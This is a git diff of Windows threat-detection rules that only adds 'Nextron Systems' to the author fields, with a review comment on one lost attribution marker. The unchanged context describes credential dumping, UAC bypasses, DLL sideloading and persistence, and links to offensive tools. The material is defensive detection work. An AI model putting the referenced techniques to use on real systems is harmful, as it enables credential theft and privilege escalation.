@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
 references:
 - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/10
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_ntds_dit.yml b/rules/windows/file/file_event/file_event_win_ntds_dit.yml
index dfa976046..80ace4d8a 100644
--- a/rules/windows/file/file_event/file_event_win_ntds_dit.yml
+++ b/rules/windows/file/file_event/file_event_win_ntds_dit.yml
@@ -7,7 +7,7 @@ references:
 - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/
 - https://pentestlab.blog/tag/ntds-dit/
 - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/11
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml b/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml
index 69f3818c5..db55e294c 100644
--- a/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml
+++ b/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb
 - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1
 - https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/11
 tags:
 - attack.credential_access
diff --git a/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml b/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml
index 40cbbb396..09bbf4087 100644
--- a/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml
+++ b/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml
@@ -5,7 +5,7 @@ description: Detects creation of files with the ".one" extension in suspicious o
 references:
 - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/
 - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/22
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/file/file_event/file_event_win_outlook_newform.yml b/rules/windows/file/file_event/file_event_win_outlook_newform.yml
index 5c5e86082..5c4622c5b 100644
--- a/rules/windows/file/file_event/file_event_win_outlook_newform.yml
+++ b/rules/windows/file/file_event/file_event_win_outlook_newform.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of new Outlook form which can contain malicious code
 references:
 - https://twitter.com/blueteamsec1/status/1401290874202382336?s=20
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2021/06/10
 modified: 2022/06/16
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml b/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml
index 5d0ce7eac..94593ccba 100644
--- a/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml
+++ b/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml
@@ -23,7 +23,7 @@ references:
 - https://github.com/samratashok/nishang
 - https://github.com/DarkCoderSc/PowerRunAsSystem/
 - https://github.com/besimorhino/powercat
-author: Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein
+author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
 date: 2018/04/07
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_psexec_service_key.yml b/rules/windows/file/file_event/file_event_win_psexec_service_key.yml
index 1e2dda422..7f2c10487 100644
--- a/rules/windows/file/file_event/file_event_win_psexec_service_key.yml
+++ b/rules/windows/file/file_event/file_event_win_psexec_service_key.yml
@@ -5,7 +5,7 @@ description: Detects creation of the PSEXEC key file. Which is created anytime a
 references:
 - https://aboutdfir.com/the-key-to-identify-psexec/
 - https://twitter.com/davisrichardg/status/1616518800584704028
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/21
 tags:
 - attack.lateral_movement
diff --git a/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml b/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml
index 8e92311ac..cf3d70e43 100755
--- a/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml
+++ b/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a dump file written by QuarksPwDump password dumper
 references:
 - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/02/10
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_sam_dump.yml b/rules/windows/file/file_event/file_event_win_sam_dump.yml
index a82debc61..54daa898c 100644
--- a/rules/windows/file/file_event/file_event_win_sam_dump.yml
+++ b/rules/windows/file/file_event/file_event_win_sam_dump.yml
@@ -8,7 +8,7 @@ references:
 - https://www.google.com/search?q=%22reg.exe+save%22+sam
 - https://github.com/HuskyHacks/ShadowSteal
 - https://github.com/FireFart/hivenightmare
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/11
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml b/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml
index e66c473f2..21d5aab7b 100644
--- a/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml
+++ b/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a Windows executable that writes files to suspicious folders
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/20
 modified: 2023/01/05
 logsource:
diff --git a/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml b/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml
index 7747fcde6..b7b08d94a 100644
--- a/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml
+++ b/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects windows executables that writes files with suspicious extensions
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/12
 modified: 2022/09/27
 logsource:
diff --git a/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml b/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml
index 0c61bb03d..6b226ce0a 100644
--- a/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious Microsoft desktopimgdownldr file creation that
 references:
 - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
 - https://twitter.com/SBousseaden/status/1278977301745741825
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/03
 modified: 2022/06/02
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_susp_double_extension.yml b/rules/windows/file/file_event/file_event_win_susp_double_extension.yml
index b59852995..428b738ad 100644
--- a/rules/windows/file/file_event/file_event_win_susp_double_extension.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_double_extension.yml
@@ -13,7 +13,7 @@ references:
 - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles
 - https://twitter.com/malwrhunterteam/status/1235135745611960321
 - https://twitter.com/luc4m/status/1073181154126254080
-author: Nasreddine Bencherchali, frack113
+author: Nasreddine Bencherchali (Nextron Systems), frack113
 date: 2022/06/19
 modified: 2022/11/07
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml b/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml
index 18333fe73..aea283dcf 100644
--- a/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
 references:
 - https://redcanary.com/blog/blackbyte-ransomware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/25
 tags:
 - attack.initial_access
diff --git a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml
index 5f407aeec..d99038b49 100644
--- a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml
@@ -11,7 +11,7 @@ references:
 - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles
 - https://twitter.com/malwrhunterteam/status/1235135745611960321
 - https://twitter.com/luc4m/status/1073181154126254080
-author: Nasreddine Bencherchali, frack113
+author: Nasreddine Bencherchali (Nextron Systems), frack113
 date: 2022/11/07
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml b/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml
index 3d71df8d5..8b51a9b82 100644
--- a/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml
@@ -5,7 +5,7 @@ description: Detects suspicious processes that write (copy) a Active Directory d
 references:
 - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/
 - https://adsecurity.org/?p=2398
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 modified: 2022/07/14
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml b/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml
index 5426d6bc5..838a2f5f9 100644
--- a/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
 references:
 - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/28
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml b/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml
index 4fdff1339..ac6800220 100644
--- a/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects when a file with a suspicious extension is created in the startup folder
 references:
 - https://github.com/last-byte/PersistenceSniper
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/10
 modified: 2023/01/06
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml b/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml
index 08b533453..d6d82c8c7 100644
--- a/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
 references:
 - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/07
 modified: 2022/08/13
 logsource:
diff --git a/rules/windows/file/file_event/file_event_win_susp_task_write.yml b/rules/windows/file/file_event/file_event_win_susp_task_write.yml
index cfd6ded58..d85c1b0d9 100644
--- a/rules/windows/file/file_event/file_event_win_susp_task_write.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_task_write.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of tasks from processes executed from suspicious locations
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/16
 modified: 2022/01/12
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml
index 997f08fc6..7be47551b 100644
--- a/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of log files during a TeamViewer remote session
 references:
 - https://www.teamviewer.com/en-us/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/30
 tags:
 - attack.command_and_control
diff --git a/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml b/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml
index f5d2001a0..eb023d40d 100644
--- a/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml
+++ b/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
 references:
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/24
 modified: 2023/01/06
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml b/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml
index 28746ba13..ac93fd74b 100644
--- a/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml
+++ b/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml
@@ -5,7 +5,7 @@ description: Detects potential privilege escalation attempt via the creation of
 references:
 - https://github.com/binderlabs/DirCreate2System
 - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt
-author: Nasreddine Bencherchali, Subhash P (@pbssubhash)
+author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
 date: 2022/12/16
 modified: 2022/12/19
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml
index 14c550838..39aaedb03 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml
index 00ebb166c..2253e434e 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
index b5dd31f77..9512cc438 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw
 - https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g
 - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute
-author: Antonio Cocomazzi (idea), Florian Roth (rule)
+author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
 date: 2022/04/27
 modified: 2022/11/22
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml
index ef4e93f2b..d313eb87c 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
 references:
 - https://github.com/Wh04m1001/IDiagnosticProfileUAC
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/03
 tags:
 - attack.execution
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml
index 5fb87a9b7..261a391c0 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
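Review bot: The new author line in file_event_win_uac_bypass_eventvwr.yml drops the `(rule)` role marker that paired with `(idea)` for Antonio Cocomazzi, so the field no longer records who wrote the rule versus who contributed the idea. Keeping both pieces of information, for example `+author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems, rule)`, preserves the original attribution while still adding the affiliation. Every other hunk in this chunk only appends the affiliation and leaves the rest of the author string intact, so this is the one place where existing attribution text is removed.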
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml
index 4d747179a..7c002dee7 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml
index d40c2e90d..842b6ed0e 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml
index 49fbb8b79..eb3cc9a6e 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml
index ef2c27bd2..cb58da9fa 100644
--- a/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml
+++ b/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml b/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml
index 314b3d8bb..5212ce362 100644
--- a/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml
+++ b/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml
@@ -5,7 +5,7 @@ description: Detects file creation patterns noticeable during the exploitation o
 references:
 - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20
 - https://twitter.com/vanitasnk/status/1437329511142420483?s=21
-author: Florian Roth, Sittikorn S
+author: Florian Roth (Nextron Systems), Sittikorn S
 date: 2021/09/10
 modified: 2022/06/17
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml b/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml
index 1fdcb431b..db8136cdc 100644
--- a/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml
+++ b/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of the default output filename used by the wmicexec tool
 references:
 - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/02
 tags:
 - attack.lateral_movement
diff --git a/rules/windows/file/file_event/file_event_win_word_template_creation.yml b/rules/windows/file/file_event/file_event_win_word_template_creation.yml
index 10fa79b03..4c1412815 100644
--- a/rules/windows/file/file_event/file_event_win_word_template_creation.yml
+++ b/rules/windows/file/file_event/file_event_win_word_template_creation.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of template files for Microsoft Office from outside Office
 references:
 - https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/06/02
 tags:
 - attack.persistence
diff --git a/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml b/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml
index 1ae74c2cf..c1675fd64 100644
--- a/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml
+++ b/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml
@@ -5,7 +5,7 @@ description: Detects creation of a file named "wpbbin" in the "%systemroot%\syst
 references:
 - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
 - https://persistence-info.github.io/Data/wpbbin.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/18
 tags:
 - attack.persistence
diff --git a/rules/windows/image_load/image_load_foggyweb_nobelium.yml b/rules/windows/image_load/image_load_foggyweb_nobelium.yml
index 8c0ca56f2..157e8a1a7 100644
--- a/rules/windows/image_load/image_load_foggyweb_nobelium.yml
+++ b/rules/windows/image_load/image_load_foggyweb_nobelium.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
 references:
 - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/09/27
 modified: 2022/12/09
 tags:
diff --git a/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml b/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml
index 80f0880dd..f8fa5c83c 100644
--- a/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml
+++ b/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects rundll32 loading a renamed comsvcs.dll to dump process memory
 references:
 - https://twitter.com/sbousseaden/status/1555200155351228419
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 tags:
 - attack.credential_access
diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml
index 03c260f8d..afc17376b 100644
--- a/rules/windows/image_load/image_load_side_load_antivirus.yml
+++ b/rules/windows/image_load/image_load_side_load_antivirus.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
 references:
 - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
-author: Nasreddine Bencherchali, Wietze Beukema (project and research)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
 date: 2022/08/17
 modified: 2023/01/29
 tags:
diff --git a/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml b/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml
index 5ba1d665f..d3936c225 100644
--- a/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml
+++ b/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
 references:
 - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/22
 tags:
 - attack.privilege_escalation
diff --git a/rules/windows/image_load/image_load_side_load_comctl32.yml b/rules/windows/image_load/image_load_side_load_comctl32.yml
index 39a6d77ca..e4caf99c1 100644
--- a/rules/windows/image_load/image_load_side_load_comctl32.yml
+++ b/rules/windows/image_load/image_load_side_load_comctl32.yml
@@ -5,7 +5,7 @@ description: Detects potential DLL sideloading using comctl32.dll to obtain syst
 references:
     - https://github.com/binderlabs/DirCreate2System
     - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt
-author: Nasreddine Bencherchali, Subhash Popuri (@pbssubhash)
+author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
 date: 2022/12/16
 modified: 2022/12/19
 tags:
diff --git a/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml b/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml
index e4cd4886c..2a7e92623 100644
--- a/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml
+++ b/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects DLL sideloading of "dbgcore.dll"
 references:
     - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
-author: Nasreddine Bencherchali, Wietze Beukema (project and research)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
 date: 2022/10/25
 modified: 2022/10/28
 tags:
diff --git a/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml b/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml
index 01b803da9..e88284af9 100644
--- a/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml
+++ b/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects DLL sideloading of "dbghelp.dll"
 references:
     - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
-author: Nasreddine Bencherchali, Wietze Beukema (project and research)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
 date: 2022/10/25
 modified: 2022/10/28
 tags:
diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
index 0a78caef7..4200548e7 100644
--- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
+++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
@@ -7,7 +7,7 @@ references:
     - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll
     - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll
